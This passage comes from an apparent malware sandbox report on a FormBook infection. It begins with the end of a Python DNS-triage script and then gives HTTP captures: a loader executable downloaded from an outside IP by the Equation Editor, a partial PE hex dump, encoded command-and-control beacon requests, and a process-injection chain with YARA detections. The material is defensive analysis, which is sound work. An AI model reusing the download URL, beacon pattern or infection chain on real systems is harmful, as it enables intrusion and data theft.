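            raise ValueError(f"unparsed query row: {row!r}")
        src, dst = split_ips(m["ips"])
        out.append({"ts": m["ts"], "src": src, "dst": dst, "tid": m["tid"], "name": m["name"]})
    return out

def parse_answers(rows, known_names):
    """Split the fused Name/CName/Address run using the queried names as
    anchors; CNAME targets are learnt as they appear so that the following
    A record for the target can be split as well (rows are in capture order)."""
    known, out = set(known_names), []
    for row in rows:
        m = ANSWER_RE.match(row)
        if not m:
            raise ValueError(f"unparsed answer row: {row!r}")
        src, dst = split_ips(m["ips"])
        name = max((n for n in known if m["names"].startswith(n)), key=len, default=None)
        if name is None:
            raise ValueError(f"no known name at start of {m['names']!r}")
        rest = m["names"][len(name):]
        rec = {"ts": m["ts"], "src": src, "dst": dst, "tid": m["tid"], "name": name,
               "rcode": RCODE_NAMES.get(int(m["rcnum"]), m["rcode"]), "cname": None, "address": None}
        if is_ipv4(rest):
            rec["address"] = rest
        elif rest != "nonenone":          # the report prints "none"/"none" for failures
            rec["cname"] = rest
            known.add(rest)
        out.append(rec)
    return out

def resolution_outcomes(queries, answers):
    """Per queried name: 'NXDOMAIN', 'SERVFAIL', or the addresses reached via CNAMEs."""
    cname = {a["name"]: a["cname"] for a in answers if a["cname"]}
    rcode, addrs = {}, {}
    for a in answers:
        rcode[a["name"]] = a["rcode"]
        if a["address"]:
            addrs.setdefault(a["name"], []).append(a["address"])
    outcomes = {}
    for q in queries:
        n = q["name"]
        if rcode.get(n) in ("NXDOMAIN", "SERVFAIL"):
            outcomes[n] = rcode[n]
            continue
        seen = set()
        while n in cname and n not in seen:   # follow the chain, guard against loops
            seen.add(n)
            n = cname[n]
        outcomes[q["name"]] = addrs.get(n, [])
    return outcomes

def triage(outcomes, min_names=4, fail_ratio=0.5):
    """Heuristic (thresholds are this example's assumption): a host walking a
    list of mostly dead domains in quick succession deserves a closer look."""
    counts = Counter("FAILED" if isinstance(v, str) else "RESOLVED" for v in outcomes.values())
    total = sum(counts.values())
    return {"total": total, "failed": counts["FAILED"], "resolved": counts["RESOLVED"],
            "suspicious": total >= min_names and counts["FAILED"] / total >= fail_ratio}

if __name__ == "__main__":
    queries = parse_queries(QUERY_ROWS)
    answers = parse_answers(ANSWER_ROWS, [q["name"] for q in queries])
    outcomes = resolution_outcomes(queries, answers)
    for name, result in outcomes.items():
        print(f"{name:26} {result}")
    print(triage(outcomes))
```

On this capture the script reports three failed and two resolved names and marks the host as suspicious. The same parsing approach (anchor on casing and the known hosts, then split fused hostnames against names already seen) carries over to the TCP and HTTP tables of these reports, whose port and address columns are fused in the same way.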

HTTP Request Dependency Graph

• 192.210.173.40
• www.spinecompanion.com
• www.doodstore.net

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 192.210.173.40 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:03:43.236814022 CEST | 0 | OUT | GET /files/loader1.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.210.173.40
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.210.173.40 | 80 | 192.168.2.22 | 49167 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:03:43.440939903 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Fri, 11 Jun 2021 06:03:41 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Thu, 10 Jun 2021 15:14:59 GMT
ETag: "36f99-5c46adac1699a"
Accept-Ranges: bytes
Content-Length: 225177
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 
02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1:uiuiuiiwiuiiidi!iiitiRichuiPELK\<2p@sp.textZZ\ `.rdatap`@@.datar@.ndata@.rsrcv@@


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49168 | 217.70.184.50 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:05:16.324655056 CEST | 238 | OUT | GET /bp3i/?k48p3Xk8=UA97/2DMKKyqmOEzj5VkqIpiqoWZJQJaus3zswYLrPQqMJGDrodJLRvFW8FHFce0tipUDw==&e6A=3fptojvPVN1xy HTTP/1.1
Host: www.spinecompanion.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 08:05:16.388231039 CEST | 239 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Jun 2021 06:05:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Vary: Accept-Language
                                                                                                                                                                                                    Data Raw: 39 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 73 70 69 6e 65 63 6f 6d 70 61 6e 69 6f 6e 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2d 30 64 64 65 30 65 62 32 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 50 61 67 65 2d 72 6f 6f 74 5f 6d 65 76 32 63 20 22 3e 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 72 6f 6f 74 5f 31 41 71 45 5a 20 50 61 72 6b 69 6e 67 2d 72 6f 6f 74 5f 56 73 4c 6a 59 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 77 72 61 70 70 65 72 5f 33 79 71 
37 5a 22 3e 3c 61 72 74 69 63 6c 65 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 2d 63 6f 6e 74 65 6e 74 5f 32 79 57 4c 77 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 74 69 74 6c 65 5f 6d 66 30 72 70 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 3c 2f 68 31 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 2d 74 65 78 74 5f 31 66 6d 63 56 20 50 61 72 6b 69 6e 67 2d 74 65 78 74 5f 46 47 44 6a 4d 22 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 68 6f 69 73 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 72 65 73 75 6c 74 73 3f 73 65 61 72 63 68 3d 73 70 69 6e 65 63 6f 6d 70 61 6e 69 6f 6e 2e 63 6f 6d 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 64 61 74 61 20 66 6f 72 20 73 70 69 6e 65 63 6f 6d 70 61 6e 69 6f 6e 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 73 65 65 20 74 68 65 20 64 6f 6d 61 69 6e e2 80 99 73 20 70 75 62 6c 69 63 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 2d 70 6f 73 69 74 69 6f 6e 62 6f 78 5f 5f 51 55 38 33 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 2d 6f 75 74 65 72 62 6f 78 5f 33 35 53 63 39 22 3e 3c 70 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 2d 62 6f 72 64 65 72 62 6f 78 5f 32 55 79 7a 66 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 70 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 64 6f 6d 61 69 6e 2f 73 75 67 67 65 73 74 3f 73 65 61
                                                                                                                                                                                                    Data Ascii: 9eb<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>spinecompanion.com</title> <link rel="stylesheet" type="text/css" href="index-0dde0eb2.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> </head> <body> <div class="ParkingPage-root_mev2c "><main class="OldStatic-root_1AqEZ Parking-root_VsLjY"><div class="OldStatic-wrapper_3yq7Z"><article class="Parking-content_2yWLw"><h1 class="OldStatic-title_mf0rp">This domain name has been registered with Gandi.net</h1><div class="OldStatic-text_1fmcV Parking-text_FGDjM"><p><a href="https://whois.gandi.net/en/results?search=spinecompanion.com"><strong>View the WHOIS data for spinecompanion.com</strong></a> to see the domains public registration information.</p></div><div class="Parking-positionbox__QU83"><div class="Parking-outerbox_35Sc9"><p class="Parking-borderbox_2Uyzf"><a href="https://shop.gandi.net/en/domain/suggest?sea


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49169 | 67.199.248.12 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:05:26.602123022 CEST | 241 | OUT | GET /bp3i/?k48p3Xk8=/O9fLU9aKIl5h5wJhcQBjfSEDJBN8B2QQZuj7hhytBKbSIIxNnTjzWGkziBiUBwkg6nLBQ==&e6A=3fptojvPVN1xy HTTP/1.1
Host: www.doodstore.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 08:05:26.753315926 CEST | 242 | IN | HTTP/1.1 302 Found
Server: nginx
Date: Fri, 11 Jun 2021 06:05:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Set-Cookie: anon_u=cHN1X19kM2E2MmI3MC1mMDBlLTQyOWItYWE0Yy0wYjRkZGRkOTM1YzI=|1623391526|4719f7e6649abaa1b7b603db567e5e5150de6544; Domain=bitly.com; expires=Wed, 08 Dec 2021 06:05:26 GMT; httponly; Path=/; secure
Strict-Transport-Security: max-age=1209600
Location: https://bitly.com/pages/landing/branded-short-domains-powered-by-bitly?bsd=doodstore.net
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Frame-Options: DENY
P3p: CP="CAO PSA OUR"
Via: 1.1 google
Connection: close


                                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    Behavior


                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    General

Start time: 08:02:38
Start date: 11/06/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f4a0000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                                                    General

Start time: 08:03:00
Start date: 11/06/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                                                                    General

Start time: 08:03:02
Start date: 11/06/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x400000
File size: 225177 bytes
MD5 hash: 116E736BA00FCA4B8499C4DF00796454
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 28%, ReversingLabs
Reputation: low

                                                                                                                                                                                                    General

Start time: 08:03:03
Start date: 11/06/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x400000
File size: 225177 bytes
MD5 hash: 116E736BA00FCA4B8499C4DF00796454
Has elevated privileges: true
Has administrator privileges: true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:08:03:07
                                                                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:0xffca0000
                                                                                                                                                                                                    File size:3229696 bytes
                                                                                                                                                                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:08:03:27
                                                                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                                                                    Imagebase:0xb40000
                                                                                                                                                                                                    File size:101888 bytes
                                                                                                                                                                                                    MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:08:03:31
                                                                                                                                                                                                    Start date:11/06/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                    Imagebase:0x4a480000
                                                                                                                                                                                                    File size:302592 bytes
                                                                                                                                                                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
